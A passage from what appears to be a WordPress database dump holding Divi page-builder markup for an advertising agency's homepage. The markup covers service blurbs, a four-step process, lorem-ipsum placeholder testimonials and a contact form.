Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-28 21:30:16','2020-07-28 21:30:16','',134,'https://52.66.212.87/2020/07/28/134-revision-v1/',0,'revision','',0),(366,1,'2020-07-28 21:31:04','2020-07-28 21:31:04','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" 